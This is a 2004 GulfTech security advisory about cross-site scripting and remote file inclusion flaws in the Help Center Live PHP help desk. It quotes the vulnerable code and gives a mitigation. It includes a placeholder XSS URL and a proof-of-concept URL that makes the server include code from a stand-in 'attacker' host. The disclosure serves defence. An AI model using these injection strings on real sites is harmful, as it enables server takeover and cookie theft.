Saturday July 31, 2010
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XMB Forums Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 MySQL Eventum Multiple Vulnerabilities
  6 Gallery 2 Multiple Vulnerabilities
  7 Geeklog Remote Code Execution
  8 RunCMS Multiple Vulnerabilities
  9 Kayako LiveResponse Multiple Vulnerabilities
10 phpRPC Library Remote Code Execution
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Research Services About Contact
Critical Vulnerability In Help Center Live
December 24, 2004
Vendor : Michael Bird
URL : http://www.helpcenterlive.com/
Version : All Versions
Risk : Multiple Vulnerabilities


Description:
Help Center Live is a `Live` help desk system written in PHP using a MySql database backend that features Live Support, Trouble Tickets and FAQ within one project. This is a very popular application, especially with webhosts and other services.


Cross Site Scripting:
Cross site scripting exists in Help Center Live. This vulnerability exists due to user supplied input not being checked properly. Below is an example.

http://path/faq/index.php?find=[CODEGOESHERE]&search=Search

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


File Include Vulnerability:
There lies a very dangerous file include vulnerability in help Center Live. An attacker can run system commands with the rights of the webserver by including a malicious file

http://path/inc/pipe.php?HCL_path=http://attacker

All an attacker has to do is include any malicious php code and it will be executed. Here is the vulnerable code, it is located in inc/pipe.php 

$decodemessage = $HCL_path . "/inc/DecodeMessage.inc";
include($decodemessage);


Since we call the pipe.php file directly we can now include a file as long as register globals is turned on in the php configuration settings. There is a similar in skin.php, this could be used in some circumstances to gain access to arbitrary local files and possibly more. 

// Get a default inner if no inner is specified
if (!isset($SKIN_inner)) {
	$SKIN_inner = "default";
}

// Get the skins
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_file = fread($handle, filesize($file));
fclose($handle);
blah_inner_default.hcl
$file = $HCL_path."/inc/skins/".$SKIN_name."/".$SKIN_type."_inner_".$SKIN_inner.".hcl";
$handle = fopen($file, "rb");
$SKIN_output_inner = fread($handle, filesize($file));
fclose($handle);



Solution:
I have contacted the developer, but received no answer. My advice would be for any users running help center live to deny direct access to the /inc/ directory, as it is not needed. This can be accomplished in apache web server by configuring a .htaccess file to effectively "deny from all" and restrict access to the directory containing the vulnerable files.


Credits:
James Bercegay of the GulfTech Security Research Team


Terms of Use | Disclaimer
Copyright 2010 GulfTech Research And Development, LLC. All Rights Reserved